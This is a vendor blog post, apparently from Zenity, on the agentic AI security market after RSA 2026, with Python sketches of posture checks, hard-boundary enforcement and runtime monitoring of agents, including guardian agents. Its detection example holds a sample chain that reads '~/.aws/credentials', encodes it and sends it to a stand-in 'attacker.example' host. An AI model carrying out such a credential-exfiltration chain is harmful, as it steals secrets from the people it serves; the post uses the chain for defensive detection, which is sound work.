
The hype is deafening, the booths were packed, but most of what the industry is calling "agentic AI security" is point products wearing platform clothes. Here is what the real thing requires.
RSA 2026 made one thing abundantly clear. Agentic AI security is the hottest category in cybersecurity right now, and almost everyone is rushing to claim a piece of it. Walking the expo floor, I saw some variation of "agentic AI security" in the messaging at what felt like every other booth. But once you got past the banners and into the demos, a familiar pattern emerged. Most of what is being sold is not comprehensive agentic AI security. It is existing products with an agentic label bolted on top, or narrow point solutions that cover one slice of the problem while ignoring the rest.
I have been writing about this space for months. In Governing Agentic AI, I examined why existing governance frameworks fail to account for autonomous agents, and in my breakdown of the UK AISI's research on 177,000 MCP tools, I highlighted the empirical data showing that agents are shifting rapidly from passive tools to active participants that modify environments, execute code, and interact with critical systems.
RSA reinforced every one of these themes.
The demand signal is there, the buyer intent is real, but the market is fragmented, and security leaders need to understand what comprehensive coverage actually requires before they start writing checks.
The Point Product Problem Is Back
If you have been in cybersecurity for more than a few years, you have seen this movie before. A new category emerges. Dozens of vendors rush in with narrow solutions. CISOs end up with a dozen tools that each solve 15% of the problem. Budgets bloat, integration becomes a nightmare, and eventually the market consolidates around platforms that do what the point products could not do individually.
We are watching the exact same pattern unfold with agentic AI security. A significant share of the vendors I saw at RSA are building solutions focused almost exclusively on one deployment pattern, typically endpoint coding agents. They can monitor what Cursor, Claude Code, or GitHub Copilot is doing on a developer's machine. That is genuinely valuable, but it is one-third of the problem at best.
As I have written about extensively, there are three major agent deployment patterns that enterprises need to secure.
- Endpoint agents, such as coding assistants and agentic browsers
- SaaS and embedded agents that come bundled inside the enterprise platforms organizations already use, from CRMs to HR tools to collaboration suites
- Homegrown or custom agents that organizations build internally for their own workflows and use cases in cloud environments such as AWS, Azure, and GCP
Most of the point solutions I encountered at RSA cover one, maybe two of these patterns. Very few can see across all three, which is not a minor gap. It is the difference between having visibility into a fraction of your agent exposure and having a comprehensive picture. A CISO buying an endpoint-only agent security tool is in the same position as a CISO who bought a CASB in 2016 and thought they had “cloud security.” It is a piece, not the puzzle.
The practical implications for security leaders are significant. If you deploy a point solution for endpoint agents, you still have no visibility into the SaaS agents embedded in your Salesforce, ServiceNow, or Microsoft 365 environments. You have no coverage for the custom agents your engineering team is building internally, and you have no unified governance layer that spans all three deployment patterns with consistent policy enforcement.
That means separate tools, separate dashboards, separate policy engines, and the same tool sprawl and integration challenges that have plagued cybersecurity for decades.
Adjacent Categories Are Claiming Territory They Cannot Hold
The other pattern I saw across RSA was existing vendors from adjacent security categories rebranding their capabilities as "agentic AI security."
DSPM vendors are claiming agent security because agents touch data. NHI vendors are claiming it because agents use non-human identities. Endpoint security vendors are claiming it because some agents run on endpoints. Cloud security vendors are claiming it because agents deploy in cloud environments. IAM vendors are claiming identity is the new perimeter for agentic systems.
Each of these categories provides genuinely relevant context. I am not dismissing any of them. But every single one of them sees agents through the narrow lens of their existing product architecture, which misses the majority of what makes agent security different.
EDR vendors can see endpoint agents, but are blind to SaaS and embedded agents running in third-party platforms, and are blind to custom agents running in cloud environments.
CNAPP and cloud security vendors can see agents deployed in cloud infrastructure, but miss endpoint agents running on developer machines and embedded agents operating inside SaaS applications.
DSPM vendors can track sensitive data flows, but lack the ability to monitor agent tool usage, action chains, or behavioral patterns at runtime.
NHI vendors can manage the identities and credentials agents use, but do not have runtime visibility into what agents are actually doing with those credentials, which tools they are calling, the actions they are taking, or whether their behavior aligns with the intended use.
This is not a theoretical gap. It is the same fragmentation problem the cloud security market had a decade ago, when organizations were juggling CSPM for posture, CWPP for workload protection, CIEM for entitlements, and KSPM for Kubernetes. Each tool addressed a real problem, but none provided comprehensive coverage on its own.
The market eventually recognized this and consolidated around CNAPP, which combined build-time and runtime coverage into a unified platform under catchphrases such as “from code to cloud.” Agentic AI security is headed down the same path, and security leaders who learn from the cloud security experience will avoid repeating the same expensive mistakes.
Identity Is Critical Context, Not the Whole Answer
I want to spend some time on the identity argument, specifically because it was one of the loudest claims at RSA. Several vendors, particularly those in the NHI and IAM space, made the case that identity is the perimeter for agentic AI systems. The argument goes that if you control the agent’s identity, credentials, and access policies, you control the risk.
There is truth in this: identity is essential context for agent security. Agents authenticate, use credentials, assume roles, and interact with systems under specific identity constructs. Understanding which agent is doing what under which identity is a foundational requirement. I am not arguing that identity does not matter. It matters a great deal and is a key signal we should incorporate from a risk perspective.
But identity is one signal among many, not the full picture. Knowing that Agent X has credentials to access System Y tells you about access. It does not tell you whether Agent X is behaving as intended, whether its actions align with the user's actual goals, whether it is being manipulated through prompt injection, whether it is taking actions that are technically within its permissions but contextually inappropriate, or whether it is chaining tool calls in ways that create emergent risks that no single permission check would catch.
Comprehensive agent security requires identity context layered with data sensitivity context, business criticality context, reachability analysis, runtime behavioral monitoring, tool usage patterns, and intent analysis. Just as CVSS scores alone are insufficient for vulnerability prioritization, identity alone is insufficient for agent risk assessment. You need the full picture.
The NHI and IAM vendors that are claiming comprehensive agent security coverage are, in most cases, providing valuable identity governance for agents while missing runtime visibility across all deployment environments, inline enforcement capabilities, behavioral analysis, intent monitoring, and the hard boundaries needed to prevent agents from taking destructive or unauthorized actions regardless of what their identity permits.
What Comprehensive Coverage Actually Requires
So what does the real thing look like? Based on my research, my work in this space, and conversations across RSA, I keep coming back to four pillars that any comprehensive platform needs to deliver across all three deployment patterns.
The first is visibility and observability. You cannot secure what you cannot see, and this remains the most fundamental gap for many enterprise organizations. A comprehensive platform needs to discover and inventory agents across endpoint, SaaS, and custom deployment environments. It needs to map what tools those agents have access to, what data they can reach, what actions they can take, what environments they operate in, and yes, what identities they are associated with. The UK AISI research, which found that agent tooling grew from roughly 5,000 to 177,000 tools in just over a year, illustrates how quickly this inventory is expanding. Without continuous discovery and visibility, every other security control is built on an incomplete foundation.
The second is AI Security Posture Management, or AISPM. This is the build-time and configuration layer. AISPM continuously assesses the security posture of agent deployments, evaluating trust boundaries, tool permissions, data access policies, identity configurations, and architectural decisions that determine the agent's risk profile before it ever takes an action. Think of it as the equivalent of CSPM for agents, but informed by the lesson that static posture alone is not enough. AISPM catches misconfigurations, overly permissive tool access, and policy violations at the design and deployment layer, before they become runtime incidents.
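To make the AISPM idea concrete, here is a minimal sketch of a build-time posture check. The manifest fields (`tools`, `data_scopes`, `owner`) and the agent name are hypothetical examples, not any real platform's schema; a real AISPM product would evaluate far richer configuration pulled from live inventory.

```python
# Illustrative AISPM-style posture check over a hypothetical agent
# manifest. Field names here are invented for the example.
def posture_findings(manifest):
    """Return a list of posture findings for one agent manifest."""
    findings = []
    # Wildcard tool access means the agent can call anything.
    if "*" in manifest.get("tools", []):
        findings.append("wildcard tool access")
    # Unscoped data access violates least privilege at the data layer.
    if manifest.get("data_scopes") and "all" in manifest["data_scopes"]:
        findings.append("unscoped data access")
    # Every agent should have an accountable human owner.
    if not manifest.get("owner"):
        findings.append("no accountable owner")
    return findings

agent = {"name": "expense-bot", "tools": ["*"], "data_scopes": ["all"]}
print(posture_findings(agent))
# → ['wildcard tool access', 'unscoped data access', 'no accountable owner']
```

The point is that these checks run at design and deployment time, against configuration, before the agent ever acts.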
The third is AI Detection and Response, or AIDR. This is the runtime layer, where the most critical gaps exist today. AIDR monitors agent behavior in real time, detecting anomalous action patterns, policy violations, prompt injection attempts, and behavioral drift that indicate an agent is operating outside its intended boundaries. This is where capabilities like intent analysis become essential. Intent analysis examines the full context of an agent's action chain, not just individual actions in isolation, to determine whether the agent's behavior aligns with what the user actually asked it to do. A single API call might look benign in isolation. A chain of tool calls that reads a credential file, encodes its contents, and sends an outbound HTTP request tells a very different story. AIDR needs to see and reason about these multi-step patterns in real time.
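The credential-exfiltration example above can be sketched as a simple ordered-pattern check over an agent's action chain. The tool names and event shapes are hypothetical, and real AIDR systems reason over much richer telemetry, but the sketch shows why individual actions look benign while the chain does not.

```python
# Minimal sketch of multi-step action-chain detection. Tool names and
# the event format are invented for illustration.
SUSPICIOUS_CHAIN = ["read_file", "encode", "http_request"]

def flags_exfil_chain(actions):
    """Return True if the read -> encode -> send pattern appears in
    order, even with benign actions interleaved between the steps."""
    idx = 0
    for action in actions:
        if action["tool"] == SUSPICIOUS_CHAIN[idx]:
            # Only count the read step if it touched a sensitive path.
            if action["tool"] == "read_file" and "credential" not in action.get("arg", ""):
                continue
            idx += 1
            if idx == len(SUSPICIOUS_CHAIN):
                return True
    return False

benign = [
    {"tool": "read_file", "arg": "README.md"},
    {"tool": "http_request", "arg": "https://api.example.com"},
]
chain = [
    {"tool": "read_file", "arg": "~/.aws/credentials"},
    {"tool": "encode", "arg": "base64"},
    {"tool": "http_request", "arg": "https://attacker.example"},
]
print(flags_exfil_chain(benign))  # False: each action alone looks harmless
print(flags_exfil_chain(chain))   # True: the full exfiltration pattern appears in order
```

Each action in `chain` would pass an isolated permission check; only reasoning over the sequence reveals the problem.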
This is also where inline enforcement, hard boundaries, and guardian agents come into play. Inline enforcement means the security platform can intervene in the agent's execution flow and block actions before they execute, not just alert after the fact. Hard boundaries are deterministic controls that cannot be bypassed, regardless of what the agent's LLM generates. If an agent should never be able to delete production databases, execute financial transactions above a threshold, or exfiltrate data to external endpoints, those boundaries need to be enforced programmatically, not probabilistically. Both are needed, but hard boundaries provide the floor that probabilistic systems cannot guarantee.
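A hard boundary can be sketched as a deterministic gate that sits in front of every tool call. The tool names and thresholds below are illustrative assumptions, not any vendor's policy language; the essential property is that the decision is pure code, so no model output can talk its way past it.

```python
# Sketch of deterministic "hard boundary" enforcement. Tool names and
# thresholds are invented for the example; real enforcement would sit
# inline in the agent's execution path.
HARD_BOUNDARIES = {
    # Never drop a database in production.
    "drop_database": lambda args: args.get("env") == "production",
    # Never move money above a fixed threshold.
    "transfer_funds": lambda args: args.get("amount", 0) > 10_000,
}

def enforce(tool, args):
    """Return 'blocked' or 'allowed' before the call executes. The
    agent's LLM output never influences this decision."""
    rule = HARD_BOUNDARIES.get(tool)
    if rule is not None and rule(args):
        return "blocked"
    return "allowed"

print(enforce("drop_database", {"env": "production"}))  # blocked
print(enforce("drop_database", {"env": "staging"}))     # allowed
print(enforce("transfer_funds", {"amount": 50_000}))    # blocked
```

This is the programmatic floor; probabilistic detection layers on top of it, never in place of it.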
Guardian agents take this a step further. Rather than relying solely on static rules or classifiers, guardian agents are purpose-built AI agents whose sole job is to monitor other agents, evaluate their actions against policy, and intervene when behavior deviates from expected patterns. They bring the adaptability of AI-based reasoning to the enforcement layer while operating under tightly constrained policies that define what they can and cannot do. Think of them as security-specific agents that watch your business agents the way a SOC analyst watches network traffic, but at machine speed and across every deployment environment.
The fourth pillar is governance. This is the policy, compliance, and accountability layer that ties everything together. Governance for agents needs to account for the unique properties that make agents different from traditional software or standalone models, including their autonomy, tool access, memory persistence, data sensitivity, and action capabilities. A comprehensive platform needs to enforce governance policies consistently across all three deployment patterns, map agent capabilities to organizational risk tolerance, and provide the audit trails and compliance evidence that regulators and boards increasingly require.
Lessons the Market Needs to Learn from Cloud Security
The parallels between where agentic AI security is today and where cloud security was a decade ago are striking. The cloud security market went through the exact same fragmentation, with CSPM, CWPP, CIEM, and other point categories each solving a piece of the puzzle. CISOs bought multiple tools, struggled with integration, and eventually demanded platforms that unified posture management and runtime protection. CNAPP emerged as the consolidation point, and the vendors that got there first won the market.
Agentic AI security is on the same trajectory, potentially moving even faster. The organizations that buy point solutions today will be consolidating onto platforms within 18 to 24 months. The vendors that build comprehensive coverage across all three deployment patterns, spanning visibility through governance with genuine runtime capabilities, will define the category. The ones that bolt an "agentic" label onto an existing DSPM, NHI, or endpoint product will get absorbed or left behind.
For CISOs evaluating vendors in this space right now, the questions that matter are straightforward. Can this platform see agents across endpoint, SaaS, and custom deployments? Does it provide both build-time posture management and runtime detection and response? Can it enforce hard boundaries and inline controls, or does it only alert after the fact? Does it reduce tool sprawl, or does it add another dashboard to the stack? And critically, does it view agents as unified constructs with identity, tools, data access, memory, and autonomous action capabilities, or does it see them only through the lens of a single adjacent category?
The Bottom Line
RSA 2026 confirmed that agentic AI security has arrived as a market category. The demand is real, the budgets are moving, and every vendor wants a piece. But the gap between what the market is selling and what enterprises actually need is significant. Most of what is available today is point products, adjacent category expansions, or single-deployment-pattern solutions that leave major blind spots.
Comprehensive agentic AI security requires visibility across all deployment patterns, posture management at build time, detection and response at runtime, and governance that accounts for what makes agents fundamentally different. It requires inline enforcement, hard boundaries, intent analysis, and the ability to see and reason about agent behavior in real time. And it requires learning from the cloud security playbook rather than repeating the same fragmentation mistakes that cost the industry years of sprawl and consolidation pain.
The organizations that demand platform-level coverage now will be the ones that deploy agents at scale with confidence. The ones that settle for point solutions will spend the next two years stitching together tools that were never designed to work together. We have seen this movie before, but it remains to be seen whether the industry learns from the last time it played.
Read Zenity’s full series of RSA 2026 blogs:
- My First RSA: Agents, Challenges, and Community
- RSA and DC Dispatches: Agentic AI Security Is the Story, Government Policy Needs to Catch Up
- Context Engineering Is Security Engineering. RSA 2026 Made the Case.
- The Floor Was Selling AI. The Hallways Were Asking for Help.
- Identity Isn’t Enough: Why AI Agent Security Requires Runtime Context